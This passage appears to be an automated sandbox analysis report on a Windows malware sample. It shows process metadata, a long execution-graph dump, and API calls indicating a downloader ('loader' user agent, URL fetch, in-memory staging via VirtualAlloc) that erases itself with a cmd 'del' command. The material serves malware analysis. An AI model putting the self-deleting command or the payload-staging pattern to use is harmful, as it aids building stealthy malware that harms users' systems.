                                                            Commandline:"C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:11:10:14
                                                            Start date:25/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:10.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:4.9%
                                                              Total number of Nodes:1157
                                                              Total number of Limit Nodes:14
21148->21112 21152->21106 21153->21108 21154->21110 21155->21129 21156->21131 21161 6024e4 21157->21161 21160 5ec9cd 7 API calls 2 library calls 21160->21136 21162 6024f4 21161->21162 21163 5ea0a2 21161->21163 21162->21163 21165 5f67d0 21162->21165 21163->21134 21163->21160 21166 5f67d7 21165->21166 21167 5f681a GetStdHandle 21166->21167 21168 5f687c 21166->21168 21169 5f682d GetFileType 21166->21169 21167->21166 21168->21162 21169->21166 21170->21139 21255 5e2e50 21171->21255 21174 5e2f0f 21177 5e7990 68 API calls 21174->21177 21175 5e2eef 21259 5e7990 21175->21259 21178 5e2f23 21177->21178 21180 5e4e80 94 API calls 21178->21180 21182 5e2f2d 21180->21182 21276 5e2eb0 40 API calls 3 library calls 21182->21276 21183 5e2f0d Sleep 21185 5e3240 21183->21185 21186 5e3262 __wsopen_s 21185->21186 21483 5e2fd0 CreateDirectoryA 21186->21483 21189 5e329c 21191 5e7990 68 API calls 21189->21191 21190 5e32ba InternetOpenUrlA 21192 5e32dc 21190->21192 21193 5e3304 21190->21193 21195 5e32b0 21191->21195 21196 5e7990 68 API calls 21192->21196 21544 5e4c50 21193->21544 21197 5e4e80 94 API calls 21195->21197 21198 5e32f0 21196->21198 21197->21190 21199 5e4e80 94 API calls 21198->21199 21200 5e32fa InternetCloseHandle 21199->21200 21200->21193 21201 5e3319 21202 5e7990 68 API calls 21201->21202 21208 5e3371 21201->21208 21204 5e334a 21202->21204 21203 5e3378 InternetReadFile 21205 5e33b7 21203->21205 21203->21208 21207 5e7990 68 API calls 21204->21207 21563 5e4b40 21205->21563 21210 5e3353 21207->21210 21208->21203 21208->21205 21554 5e4d50 21208->21554 21213 5e4e80 94 API calls 21210->21213 21214 5e335d InternetCloseHandle InternetCloseHandle 21213->21214 21214->21208 21215 5e342c 21578 5e3820 21215->21578 21216 5e33eb 21216->21215 21217 5e7990 68 API calls 21216->21217 21220 5e3419 21217->21220 21219 5e343b 21583 5e38f0 21219->21583 21222 5e7990 68 API calls 21220->21222 21223 5e3422 21222->21223 21224 5e4e80 94 API calls 21223->21224 21224->21215 21225 5e344c fpos 
Concurrency::cancellation_token_source::~cancellation_token_source 21593 5e3630 21225->21593 21227 5e3466 fpos 21597 5e3a00 21227->21597 21229 5e3488 21604 5e3670 21229->21604 21231 5e3493 fpos 21232 5e34a2 VirtualAlloc 21231->21232 21233 5e34b4 21232->21233 21237 5e34d2 ctype fpos 21232->21237 21234 5e7990 68 API calls 21233->21234 21235 5e34c8 21234->21235 21236 5e4e80 94 API calls 21235->21236 21236->21237 21238 5e34f9 VirtualFree 21237->21238 21239 5e7990 68 API calls 21238->21239 21240 5e351e 21239->21240 21241 5e4e80 94 API calls 21240->21241 21242 5e3528 21241->21242 21609 5e3610 21242->21609 21246 5e3543 21615 5e2e20 21246->21615 21248 5e3555 Sleep 21249 5e2f40 GetCurrentProcess SetPriorityClass GetCurrentThread SetThreadPriority 21248->21249 22216 5f14c3 21249->22216 21251 5e2f71 SHChangeNotify 21252 5e2f83 21251->21252 22217 5e1170 21252->22217 21277 5eb790 21255->21277 21258 5e2e8a 21258->21174 21258->21175 21261 5e79c2 char_traits 21259->21261 21279 5e5750 21261->21279 21265 5e2f03 21273 5e4e80 21265->21273 21266 5e7a6d 21286 5e6400 21266->21286 21267 5e7b26 21272 5e7b65 char_traits 21267->21272 21283 5e6270 21267->21283 21270 5e85c0 67 API calls 21270->21272 21271 5e7a57 char_traits 21271->21266 21271->21267 21294 5e85c0 21271->21294 21272->21266 21272->21270 21423 5e7ca0 21273->21423 21276->21183 21278 5e2e6c GetVersionExA 21277->21278 21278->21258 21280 5e577a std::ios_base::good 21279->21280 21282 5e5798 std::ios_base::good 21280->21282 21298 5e7140 21280->21298 21282->21271 21306 5e3e30 21283->21306 21284 5e6290 21284->21272 21287 5e6414 std::ios_base::good 21286->21287 21370 5e6430 21287->21370 21290 5e56e0 21291 5e5703 21290->21291 21293 5e572c 21291->21293 21385 5e71e0 40 API calls std::ios_base::good 21291->21385 21293->21265 21295 5e85d1 21294->21295 21296 5e85e5 21295->21296 21386 5e4520 21295->21386 21296->21271 21299 5e7170 21298->21299 21300 5e71cb 21299->21300 21301 5e5750 40 API calls 21299->21301 21300->21282 21304 5e7185 21301->21304 
21302 5e71bc 21303 5e56e0 40 API calls 21302->21303 21303->21300 21304->21302 21305 5e6400 40 API calls 21304->21305 21305->21302 21307 5e3e42 21306->21307 21309 5e3e5b std::ios_base::failure::failure 21306->21309 21307->21284 21309->21307 21310 5eeb89 21309->21310 21311 5eeb9c _Fputc 21310->21311 21316 5ee96b 21311->21316 21313 5eebb1 21324 5eddcb 21313->21324 21317 5ee9a1 21316->21317 21318 5ee979 21316->21318 21317->21313 21318->21317 21319 5ee9a8 21318->21319 21320 5ee986 21318->21320 21330 5ee8c4 21319->21330 21338 5f13c0 29 API calls 2 library calls 21320->21338 21325 5eddd7 21324->21325 21326 5eddee 21325->21326 21368 5edf81 39 API calls 2 library calls 21325->21368 21328 5ede01 21326->21328 21369 5edf81 39 API calls 2 library calls 21326->21369 21328->21307 21331 5ee8d0 CallCatchBlock 21330->21331 21339 5ee89c EnterCriticalSection 21331->21339 21333 5ee8de 21340 5ee91f 21333->21340 21337 5ee8fc 21337->21313 21338->21317 21339->21333 21348 5f8f5c 21340->21348 21347 5ee913 LeaveCriticalSection __fread_nolock 21347->21337 21349 5f8f1e 39 API calls 21348->21349 21351 5f8f6d 21349->21351 21350 5ee937 21355 5ee9e2 21350->21355 21351->21350 21352 5f9045 __fread_nolock 15 API calls 21351->21352 21353 5f8fc6 21352->21353 21354 5f7531 ___free_lconv_mon 14 API calls 21353->21354 21354->21350 21358 5ee9f4 21355->21358 21359 5ee955 21355->21359 21356 5eea02 21357 5f13c0 _Fputc 29 API calls 21356->21357 21357->21359 21358->21356 21358->21359 21362 5eea38 _Fputc ctype 21358->21362 21364 5f9007 21359->21364 21360 5ee238 ___scrt_uninitialize_crt 64 API calls 21360->21362 21361 5f5e72 _Fgetc 39 API calls 21361->21362 21362->21359 21362->21360 21362->21361 21363 5f7204 __wsopen_s 64 API calls 21362->21363 21363->21362 21365 5f9012 21364->21365 21366 5ee8eb 21364->21366 21365->21366 21367 5ee238 ___scrt_uninitialize_crt 64 API calls 21365->21367 21366->21347 21367->21366 21368->21326 21369->21328 21371 5e6442 21370->21371 21374 5e26b0 21371->21374 21375 5e273c 21374->21375 
21376 5e26d9 21374->21376 21375->21290 21377 5e26ea std::make_error_code 21376->21377 21382 5eb1a3 RaiseException 21376->21382 21383 5e2650 40 API calls std::ios_base::failure::failure 21377->21383 21380 5e272e 21384 5eb1a3 RaiseException 21380->21384 21382->21377 21383->21380 21384->21375 21385->21293 21387 5e4530 char_traits 21386->21387 21388 5e45c1 21387->21388 21389 5e454a char_traits 21387->21389 21390 5e45ff codecvt 21387->21390 21396 5e2ac0 21388->21396 21389->21296 21392 5e4656 21390->21392 21393 5e464e 21390->21393 21392->21389 21394 5eeb89 67 API calls 21392->21394 21393->21389 21395 5e2ac0 _Fputc 41 API calls 21393->21395 21394->21389 21395->21389 21399 5edfcb 21396->21399 21400 5edfde _Fputc 21399->21400 21405 5ede07 21400->21405 21402 5edfed 21403 5eddcb _Fputc 39 API calls 21402->21403 21404 5e2ad2 21403->21404 21404->21389 21406 5ede13 CallCatchBlock 21405->21406 21407 5ede1c 21406->21407 21408 5ede40 21406->21408 21420 5f13c0 29 API calls 2 library calls 21407->21420 21419 5ee89c EnterCriticalSection 21408->21419 21411 5ede49 21412 5f5e72 _Fgetc 39 API calls 21411->21412 21415 5ede5e 21411->21415 21412->21415 21413 5edeca 21421 5f13c0 29 API calls 2 library calls 21413->21421 21414 5edefb _Fputc 21422 5edf33 LeaveCriticalSection __fread_nolock 21414->21422 21415->21413 21415->21414 21418 5ede35 _Fgetc 21418->21402 21419->21411 21420->21418 21421->21418 21422->21418 21430 5e76e0 21423->21430 21425 5e7cb7 21434 5e8630 21425->21434 21428 5e7140 40 API calls 21429 5e4e8e 21428->21429 21429->21183 21431 5e770a std::ios_base::getloc 21430->21431 21443 5e7890 21431->21443 21433 5e7728 std::ios_base::_Ios_base_dtor ctype 21433->21425 21435 5e5750 40 API calls 21434->21435 21436 5e8668 21435->21436 21439 5e85c0 67 API calls 21436->21439 21441 5e867e char_traits 21436->21441 21437 5e6400 40 API calls 21438 5e8727 21437->21438 21440 5e56e0 40 API calls 21438->21440 21439->21441 21442 5e7cc3 21440->21442 21441->21437 21442->21428 21457 5e9023 21443->21457 
21447 5e78ce 21448 5e78ec 21447->21448 21476 5e22d0 69 API calls std::_Facet_Register 21447->21476 21469 5e907b 21448->21469 21451 5e7976 21451->21433 21452 5e7901 21453 5e7909 21452->21453 21454 5e7910 21452->21454 21477 5e1b90 RaiseException std::ios_base::clear std::bad_alloc::bad_alloc 21453->21477 21478 5e9391 RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 21454->21478 21458 5e9039 21457->21458 21459 5e9032 21457->21459 21461 5e78b5 21458->21461 21480 5e9a98 EnterCriticalSection 21458->21480 21479 5f1569 6 API calls 2 library calls 21459->21479 21463 5e1e00 21461->21463 21464 5e1e45 21463->21464 21465 5e1e11 21463->21465 21464->21447 21466 5e9023 std::_Lockit::_Lockit 7 API calls 21465->21466 21467 5e1e1b 21466->21467 21468 5e907b std::_Lockit::~_Lockit 2 API calls 21467->21468 21468->21464 21470 5f1577 21469->21470 21471 5e9085 21469->21471 21482 5f1552 LeaveCriticalSection 21470->21482 21475 5e9098 21471->21475 21481 5e9aa6 LeaveCriticalSection 21471->21481 21474 5f157e 21474->21451 21475->21451 21476->21452 21477->21448 21478->21448 21479->21461 21480->21461 21481->21475 21482->21474 21618 5e5280 21483->21618 21485 5e3008 21486 5e5280 std::ios_base::failure::failure 40 API calls 21485->21486 21487 5e301c 21486->21487 21622 5e2cb0 InternetOpenA 21487->21622 21491 5e303c 21492 5e5210 task 39 API calls 21491->21492 21493 5e304b 21492->21493 21494 5e5280 std::ios_base::failure::failure 40 API calls 21493->21494 21495 5e3058 21494->21495 21496 5e5280 std::ios_base::failure::failure 40 API calls 21495->21496 21497 5e306c 21496->21497 21498 5e2cb0 105 API calls 21497->21498 21499 5e307d 21498->21499 21500 5e5210 task 39 API calls 21499->21500 21501 5e308c 21500->21501 21502 5e5210 task 39 API calls 21501->21502 21503 5e309b 21502->21503 21504 5e5280 std::ios_base::failure::failure 40 API calls 21503->21504 21505 5e30ab 21504->21505 21506 5e5280 std::ios_base::failure::failure 40 API calls 21505->21506 21507 5e30c2 21506->21507 21508 
5e2cb0 105 API calls 21507->21508 21509 5e30d9 21508->21509 21510 5e5210 task 39 API calls 21509->21510 21511 5e30eb 21510->21511 21512 5e5210 task 39 API calls 21511->21512 21513 5e30fd 21512->21513 21514 5e5280 std::ios_base::failure::failure 40 API calls 21513->21514 21515 5e310d 21514->21515 21516 5e5280 std::ios_base::failure::failure 40 API calls 21515->21516 21517 5e3124 21516->21517 21518 5e2cb0 105 API calls 21517->21518 21519 5e313b 21518->21519 21520 5e5210 task 39 API calls 21519->21520 21521 5e314d 21520->21521 21522 5e5210 task 39 API calls 21521->21522 21523 5e315f 21522->21523 21524 5e5280 std::ios_base::failure::failure 40 API calls 21523->21524 21525 5e316f 21524->21525 21526 5e5280 std::ios_base::failure::failure 40 API calls 21525->21526 21527 5e3186 21526->21527 21528 5e2cb0 105 API calls 21527->21528 21529 5e319d 21528->21529 21530 5e5210 task 39 API calls 21529->21530 21531 5e31af 21530->21531 21532 5e5210 task 39 API calls 21531->21532 21533 5e31c1 21532->21533 21534 5e5280 std::ios_base::failure::failure 40 API calls 21533->21534 21535 5e31d1 21534->21535 21536 5e5280 std::ios_base::failure::failure 40 API calls 21535->21536 21537 5e31e8 21536->21537 21538 5e2cb0 105 API calls 21537->21538 21539 5e31ff 21538->21539 21540 5e5210 task 39 API calls 21539->21540 21541 5e3211 21540->21541 21542 5e5210 task 39 API calls 21541->21542 21543 5e3223 Sleep InternetOpenA 21542->21543 21543->21189 21543->21190 21545 5e4c7b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot std::runtime_error::runtime_error 21544->21545 21735 5e6310 21545->21735 21551 5e4d17 21552 5e4d31 21551->21552 21553 5e6400 40 API calls 21551->21553 21552->21201 21553->21552 21555 5e5750 40 API calls 21554->21555 21558 5e4d88 21555->21558 21556 5e6400 40 API calls 21557 5e4e4e 21556->21557 21559 5e56e0 40 API calls 21557->21559 21561 5e6270 67 API calls 21558->21561 21562 5e4d9e 21558->21562 21560 5e4e63 21559->21560 21560->21208 21561->21562 21562->21556 21942 5e5e60 
21563->21942 21566 5e33c2 InternetCloseHandle InternetCloseHandle 21568 5e3720 21566->21568 21567 5e6400 40 API calls 21567->21566 21569 5e374b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot std::runtime_error::runtime_error 21568->21569 21954 5e5ad0 21569->21954 21572 5e5fb0 44 API calls 21573 5e37c9 21572->21573 21574 5e5ed0 98 API calls 21573->21574 21575 5e37e7 21574->21575 21576 5e3801 21575->21576 21577 5e6400 40 API calls 21575->21577 21576->21216 21577->21576 21958 5e5960 21578->21958 21580 5e384c 21581 5e388d 21580->21581 21962 5e62d0 21580->21962 21581->21219 21584 5e3927 std::ios_base::good 21583->21584 21585 5e6430 40 API calls 21584->21585 21586 5e3943 21585->21586 21587 5e5960 69 API calls 21586->21587 21588 5e3951 21587->21588 21589 5e39cb 21588->21589 21590 5e62d0 68 API calls 21588->21590 21589->21225 21591 5e3998 fpos 21590->21591 21591->21589 21592 5e6400 40 API calls 21591->21592 21592->21589 21594 5e364a 21593->21594 22048 5e7d00 21594->22048 21596 5e365a 21596->21227 21598 5e5960 69 API calls 21597->21598 21600 5e3a47 21598->21600 21599 5e6400 40 API calls 21601 5e3b20 21599->21601 21603 5e3aa2 21600->21603 22066 5e62a0 21600->22066 21601->21229 21603->21599 21605 5e5e60 70 API calls 21604->21605 21606 5e3682 21605->21606 21607 5e369c 21606->21607 21608 5e6400 40 API calls 21606->21608 21607->21231 21608->21607 22202 5e5a20 21609->22202 21612 5e3570 22206 5e36c0 21612->22206 21614 5e3582 std::bad_exception::~bad_exception 21614->21246 22213 5e4b90 21615->22213 21617 5e2e32 std::bad_exception::~bad_exception 21617->21248 21619 5e52ab std::ios_base::failure::failure 21618->21619 21646 5e67a0 21619->21646 21621 5e52dd Concurrency::cancellation_token_source::~cancellation_token_source 21621->21485 21623 5e2cee 21622->21623 21624 5e2e08 21622->21624 21655 5e2b40 21623->21655 21643 5e5210 21624->21643 21626 5e2cfb std::runtime_error::runtime_error 21627 5e2d14 InternetOpenUrlA 21626->21627 21628 5e5210 task 39 API calls 21627->21628 21629 
5e2d2a 21628->21629 21630 5e2dfe InternetCloseHandle 21629->21630 21631 5e2b40 40 API calls 21629->21631 21630->21624 21632 5e2d41 21631->21632 21665 5e4bf0 21632->21665 21635 5e5210 task 39 API calls 21641 5e2d75 21635->21641 21636 5e2de2 InternetCloseHandle 21637 5e2e20 70 API calls 21636->21637 21637->21630 21638 5e2d98 InternetReadFile 21639 5e2dd7 21638->21639 21638->21641 21640 5e4b40 71 API calls 21639->21640 21640->21636 21641->21636 21641->21638 21641->21639 21642 5e4d50 68 API calls 21641->21642 21642->21641 21731 5e6630 21643->21731 21645 5e521f task 21645->21491 21647 5e67b0 std::runtime_error::runtime_error char_traits 21646->21647 21650 5e67d0 21647->21650 21649 5e67c9 21649->21621 21651 5e6828 21650->21651 21653 5e67e4 std::ios_base::failure::failure task std::runtime_error::runtime_error 21650->21653 21654 5e80d0 40 API calls 4 library calls 21651->21654 21653->21649 21654->21653 21656 5e2b6b Concurrency::cancellation_token_source::~cancellation_token_source 21655->21656 21669 5e4f40 21656->21669 21658 5e2b93 std::runtime_error::runtime_error 21659 5e2c20 std::ios_base::failure::failure 21658->21659 21673 5e50a0 21658->21673 21677 5e4f20 21659->21677 21662 5e5210 task 39 API calls 21663 5e2c97 21662->21663 21663->21626 21666 5e4c0b std::runtime_error::runtime_error 21665->21666 21667 5e4c50 100 API calls 21666->21667 21668 5e2d69 21667->21668 21668->21635 21670 5e4f5a 21669->21670 21680 5e7eb0 21670->21680 21672 5e4f6a 21672->21658 21674 5e5104 21673->21674 21676 5e50bd task std::runtime_error::runtime_error 21673->21676 21688 5e7f60 21674->21688 21676->21658 21726 5e6470 21677->21726 21681 5e7eeb std::ios_base::failure::failure 21680->21681 21682 5e7f3c Concurrency::cancellation_token_source::~cancellation_token_source 21681->21682 21686 5e8780 40 API calls 21681->21686 21682->21672 21684 5e7efd 21687 5e83b0 39 API calls Concurrency::cancellation_token_source::~cancellation_token_source 21684->21687 21686->21684 21687->21682 21689 5e7f80 
std::ios_base::failure::failure 21688->21689 21691 5e7f8d std::ios_base::failure::failure Concurrency::cancellation_token_source::~cancellation_token_source 21689->21691 21700 5e1550 40 API calls std::_Xinvalid_argument 21689->21700 21696 5e7540 21691->21696 21693 5e7fc8 Concurrency::cancellation_token_source::~cancellation_token_source std::runtime_error::runtime_error 21695 5e8037 std::ios_base::failure::failure 21693->21695 21701 5e7570 21693->21701 21695->21676 21697 5e7550 allocator 21696->21697 21704 5e8370 21697->21704 21700->21691 21721 5e8300 21701->21721 21703 5e7584 21703->21695 21705 5e837c 21704->21705 21708 5e838a 21704->21708 21710 5e8b30 21705->21710 21707 5e7559 21707->21693 21708->21707 21718 5e1490 21708->21718 21711 5e8b4c 21710->21711 21712 5e8b47 21710->21712 21714 5e1490 _Allocate RaiseException EnterCriticalSection LeaveCriticalSection 21711->21714 21713 5e1400 Concurrency::cancel_current_task RaiseException 21712->21713 21713->21711 21716 5e8b55 21714->21716 21715 5f144d _Allocate 39 API calls 21715->21716 21716->21715 21717 5e8b70 21716->21717 21717->21707 21719 5e9d53 std::_Facet_Register RaiseException EnterCriticalSection LeaveCriticalSection 21718->21719 21720 5e149c 21719->21720 21720->21707 21722 5e832e _MallocaArrayHolder 21721->21722 21723 5e8321 21721->21723 21722->21703 21725 5e14b0 39 API calls _Allocate 21723->21725 21725->21722 21728 5e64b4 Concurrency::cancellation_token_source::~cancellation_token_source 21726->21728 21727 5e2c88 21727->21662 21728->21727 21730 5e7340 39 API calls allocator 21728->21730 21730->21727 21733 5e6656 task ctype Concurrency::cancellation_token_source::~cancellation_token_source 21731->21733 21732 5e669a task 21732->21645 21733->21732 21734 5e7570 allocator 39 API calls 21733->21734 21734->21732 21737 5e633b Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21735->21737 21752 5e72b0 21737->21752 21739 5e5fb0 21785 5e70e0 21739->21785 21741 5e5fd4 21790 5e5d90 21741->21790 21743 5e4cf9 21744 
5e5ed0 21743->21744 21745 5e5efb 21744->21745 21751 5e5ef7 std::ios_base::_Ios_base_dtor 21744->21751 21796 5e97c3 21745->21796 21748 5e5d90 39 API calls 21749 5e5f2a 21748->21749 21806 5e7db0 69 API calls 5 library calls 21749->21806 21751->21551 21761 5e2940 21752->21761 21755 5e76e0 69 API calls 21756 5e72dc 21755->21756 21757 5e72f7 21756->21757 21758 5e6400 40 API calls 21756->21758 21759 5e4cbb 21757->21759 21768 5e95dd 9 API calls 2 library calls 21757->21768 21758->21757 21759->21739 21769 5e2750 21761->21769 21766 5e29c6 21766->21755 21768->21759 21770 5e26b0 std::ios_base::clear 40 API calls 21769->21770 21771 5e2765 21770->21771 21772 5e9d53 21771->21772 21773 5e9d58 ___std_exception_copy 21772->21773 21774 5e29b2 21773->21774 21777 5e9d74 std::_Facet_Register 21773->21777 21782 5f2d69 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 21773->21782 21774->21766 21781 5e1f20 44 API calls std::locale::_Init 21774->21781 21776 5ea3e9 stdext::threads::lock_error::lock_error 21784 5eb1a3 RaiseException 21776->21784 21777->21776 21783 5eb1a3 RaiseException 21777->21783 21779 5ea406 21781->21766 21782->21773 21783->21776 21784->21779 21786 5e9d53 std::_Facet_Register 3 API calls 21785->21786 21787 5e70f9 21786->21787 21789 5e710d 21787->21789 21794 5e1f20 44 API calls std::locale::_Init 21787->21794 21789->21741 21791 5e5d9f 21790->21791 21792 5e5e00 21791->21792 21795 5ee856 39 API calls 2 library calls 21791->21795 21792->21743 21794->21789 21795->21792 21797 5e971d 21796->21797 21798 5e977e 21797->21798 21800 5e97cc 42 API calls 21797->21800 21801 5e5f0c 21797->21801 21803 5e9785 21798->21803 21807 5e97cc 21798->21807 21800->21798 21801->21748 21801->21751 21803->21801 21816 5ee487 21803->21816 21806->21751 21822 5f18cf 21807->21822 21810 5f11de 21811 5f11f1 _Fputc 21810->21811 21874 5f0f35 21811->21874 21814 5eddcb _Fputc 39 API calls 21815 5f1213 21814->21815 21815->21803 21817 5ee49a _Fputc 21816->21817 21908 5ee362 21817->21908 21819 5ee4a6 
21820 5eddcb _Fputc 39 API calls 21819->21820 21821 5ee4b2 21820->21821 21821->21801 21823 5f1818 CallCatchBlock 21822->21823 21824 5f182b 21823->21824 21826 5f184b 21823->21826 21847 5f2009 14 API calls __dosmaperr 21824->21847 21828 5f185d 21826->21828 21829 5f1850 21826->21829 21827 5f1830 21848 5f143d 39 API calls __strnicoll 21827->21848 21839 5f776f 21828->21839 21849 5f2009 14 API calls __dosmaperr 21829->21849 21834 5f186d 21850 5f2009 14 API calls __dosmaperr 21834->21850 21835 5f187a 21851 5f18b8 LeaveCriticalSection __fread_nolock 21835->21851 21838 5e979e 21838->21801 21838->21810 21840 5f777b CallCatchBlock 21839->21840 21852 5f150a EnterCriticalSection 21840->21852 21842 5f7789 21853 5f7813 21842->21853 21847->21827 21849->21838 21850->21838 21851->21838 21852->21842 21860 5f7836 21853->21860 21854 5f788e 21855 5f8686 _unexpected 14 API calls 21854->21855 21856 5f7897 21855->21856 21858 5f7531 ___free_lconv_mon 14 API calls 21856->21858 21859 5f78a0 21858->21859 21862 5f7796 21859->21862 21871 5f8c97 6 API calls std::_Locinfo::_Locinfo_dtor 21859->21871 21860->21854 21860->21860 21860->21862 21869 5ee89c EnterCriticalSection 21860->21869 21870 5ee8b0 LeaveCriticalSection 21860->21870 21866 5f77cf 21862->21866 21864 5f78bf 21872 5ee89c EnterCriticalSection 21864->21872 21873 5f1552 LeaveCriticalSection 21866->21873 21868 5f1866 21868->21834 21868->21835 21869->21860 21870->21860 21871->21864 21872->21862 21873->21868 21876 5f0f41 CallCatchBlock 21874->21876 21875 5f0f47 21895 5f13c0 29 API calls 2 library calls 21875->21895 21876->21875 21878 5f0f8a 21876->21878 21885 5ee89c EnterCriticalSection 21878->21885 21879 5f0f62 21879->21814 21881 5f0f96 21886 5f10b8 21881->21886 21883 5f0fac 21896 5f0fd5 LeaveCriticalSection __fread_nolock 21883->21896 21885->21881 21887 5f10de 21886->21887 21888 5f10cb 21886->21888 21897 5f0fdf 21887->21897 21888->21883 21890 5f1101 21894 5f118f 21890->21894 21901 5ee238 21890->21901 21893 5fb1b4 __wsopen_s 41 API calls 
21893->21894 21894->21883 21895->21879 21896->21879 21898 5f0ff0 21897->21898 21899 5f1048 21897->21899 21898->21899 21907 5fb174 41 API calls 2 library calls 21898->21907 21899->21890 21902 5ee251 21901->21902 21906 5ee278 21901->21906 21903 5f5e72 _Fgetc 39 API calls 21902->21903 21902->21906 21904 5ee26d 21903->21904 21905 5f7204 __wsopen_s 64 API calls 21904->21905 21905->21906 21906->21893 21907->21899 21909 5ee36e CallCatchBlock 21908->21909 21910 5ee39b 21909->21910 21911 5ee378 21909->21911 21918 5ee393 21910->21918 21919 5ee89c EnterCriticalSection 21910->21919 21934 5f13c0 29 API calls 2 library calls 21911->21934 21914 5ee3b9 21920 5ee3f9 21914->21920 21916 5ee3c6 21935 5ee3f1 LeaveCriticalSection __fread_nolock 21916->21935 21918->21819 21919->21914 21921 5ee429 21920->21921 21922 5ee406 21920->21922 21924 5ee238 ___scrt_uninitialize_crt 64 API calls 21921->21924 21925 5ee421 21921->21925 21940 5f13c0 29 API calls 2 library calls 21922->21940 21926 5ee441 21924->21926 21925->21916 21936 5f78d5 21926->21936 21929 5f5e72 _Fgetc 39 API calls 21930 5ee455 21929->21930 21941 5f75fc 44 API calls _Fputc 21930->21941 21932 5ee45c 21932->21925 21933 5f7531 ___free_lconv_mon 14 API calls 21932->21933 21933->21925 21934->21918 21935->21918 21937 5f78ec 21936->21937 21938 5ee449 21936->21938 21937->21938 21939 5f7531 ___free_lconv_mon 14 API calls 21937->21939 21938->21929 21939->21938 21940->21925 21941->21932 21943 5e5ea2 21942->21943 21944 5e5e72 21942->21944 21945 5e5d90 39 API calls 21943->21945 21950 5e5c80 21944->21950 21946 5e4b52 21945->21946 21946->21566 21946->21567 21949 5ee487 69 API calls 21949->21943 21951 5e5c9d 21950->21951 21952 5e5c92 codecvt char_traits 21950->21952 21951->21949 21952->21951 21953 5eeb89 67 API calls 21952->21953 21953->21951 21955 5e5afb Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21954->21955 21956 5e72b0 71 API calls 21955->21956 21957 5e378b 21956->21957 21957->21572 21959 5e5988 21958->21959 21965 5e6da0 
21959->21965 21961 5e599e 21961->21580 21976 5e3d50 21962->21976 21963 5e62f8 21963->21581 21966 5e6dd7 std::ios_base::good 21965->21966 21967 5e6dde 21966->21967 21969 5e6df9 21966->21969 21968 5e6400 40 API calls 21967->21968 21971 5e6df2 std::ios_base::good 21968->21971 21970 5e7140 40 API calls 21969->21970 21973 5e6e1c std::ios_base::getloc 21969->21973 21970->21973 21971->21961 21972 5e6400 40 API calls 21972->21971 21974 5e7890 69 API calls 21973->21974 21975 5e6e72 std::ios_base::_Ios_base_dtor ctype char_traits 21973->21975 21974->21975 21975->21971 21975->21972 21977 5e3d61 21976->21977 21978 5e5c80 67 API calls 21977->21978 21979 5e3de1 21977->21979 21980 5e3d9d 21978->21980 21979->21963 21980->21979 21981 5e3dca 21980->21981 21984 5f11a4 21980->21984 21981->21979 21990 5f0791 21981->21990 21985 5f11b7 _Fputc 21984->21985 21986 5f0f35 66 API calls 21985->21986 21987 5f11cc 21986->21987 21988 5eddcb _Fputc 39 API calls 21987->21988 21989 5f11d9 21988->21989 21989->21981 21991 5f079c 21990->21991 21992 5f07b1 21990->21992 22010 5f2009 14 API calls __dosmaperr 21991->22010 21994 5f07ce 21992->21994 21995 5f07b9 21992->21995 22004 5fa551 21994->22004 22012 5f2009 14 API calls __dosmaperr 21995->22012 21997 5f07a1 22011 5f143d 39 API calls __strnicoll 21997->22011 22001 5f07be 22013 5f143d 39 API calls __strnicoll 22001->22013 22005 5fa565 _Fputc 22004->22005 22014 5f9f5a 22005->22014 22008 5eddcb _Fputc 39 API calls 22009 5f07c9 22008->22009 22009->21979 22010->21997 22012->22001 22015 5f9f66 CallCatchBlock 22014->22015 22016 5f9f6d 22015->22016 22017 5f9f90 22015->22017 22040 5f13c0 29 API calls 2 library calls 22016->22040 22025 5ee89c EnterCriticalSection 22017->22025 22020 5f9f9e 22026 5f9fe9 22020->22026 22022 5f9fad 22041 5f9fdf LeaveCriticalSection __fread_nolock 22022->22041 22024 5f9f86 22024->22008 22025->22020 22027 5f9ff8 22026->22027 22028 5fa020 22026->22028 22045 5f13c0 29 API calls 2 library calls 22027->22045 22029 5f5e72 _Fgetc 39 API calls 

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 005E2FD0: CreateDirectoryA.KERNEL32(C:\Program Files (x86)\Everything,00000000), ref: 005E2FF5
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3037
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3046
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3087
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3096
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E30E6
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E30F8
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E3148
                                                                • Part of subcall function 005E2FD0: task.LIBCPMTD ref: 005E315A
                                                              • Sleep.KERNEL32(00000BB8,?,00608613,000000FF), ref: 005E326C
                                                              • InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 005E328D
                                                              • InternetOpenUrlA.WININET(00000000,\Ga,00000000,00000000,80000000,00000000), ref: 005E32CD
                                                              • InternetCloseHandle.WININET(?), ref: 005E32FE
                                                              • InternetCloseHandle.WININET(?), ref: 005E3361
                                                              • InternetCloseHandle.WININET(?), ref: 005E336B
